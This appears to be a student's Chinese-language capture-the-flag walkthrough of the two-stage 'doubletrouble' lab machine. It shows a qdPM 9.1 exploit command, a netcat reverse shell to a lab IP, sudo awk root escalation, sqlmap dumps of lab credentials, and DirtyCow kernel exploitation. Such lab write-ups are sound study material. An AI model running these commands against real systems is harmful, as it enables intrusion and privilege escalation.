学长的任务罢了7-doubletrouble

扫描打点

朴实无华的端口：

qdpm9.1 ，搜了一下一大把 poc ，但因为没登陆一个都不能用

扫一下网站目录：

去 secret 里面找到张图片，佬提示我们是隐写

stegseek 爆破一下：

里面的账密可以登录：
拿 shell

searchspploit 搜一下 poc ：

python 50944.py -url http://192.168.56.107/ -u otisrush@localhost.com -p otis666

可以命令执行，那么直接反弹 shell

cmd=nc -e /bin/bash 192.168.56.101 443
提权
- sudo -l
  
  直接出了，准备 awk 提权
  
  sudo awk 'BEGIN {system("/bin/sh")}'
  
  然后去 root 文件夹下找到另一个靶机，进二阶段：
二阶段

靶机上 python3 开服务器用 kali wget
- 扫描打点
  
  注意这个内核
  
  这个网站 dirsearch 没东西
  
  sqlmap 扫出来时间盲注
  
  打一下：
  
  sqlmap -r sql.txt --batch -dbs
  
  sqlmap -r sql.txt --batch -D doubletrouble --tables
  
  sqlmap -r sql.txt --batch -D doubletrouble -T users --dump
  
  拿到两个账密：
  
  montreux:GfsZxc1 clapton:ZubZub99
  
  发现这两个都不能登录网站，而第二个可以登 ssh
- 内核提取
  - sudo -l 不让
  - find / -perm -u=s -type f 2>/dev/null
    
    没什么奇怪的东西
  - ps aux
    
    没看出来qwq
  - uname -a
    
    Linux doubletrouble 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux
    
    3.2 的内核，佬教我们老的内核一般可以拿脏牛 dirtycow 来提权
    
    还是传上去，然后：
    1
    2
    3
    gcc -pthread dirtycow.c -o dirty -lcrypt
    ./dirty
    root
    经过漫长的等待；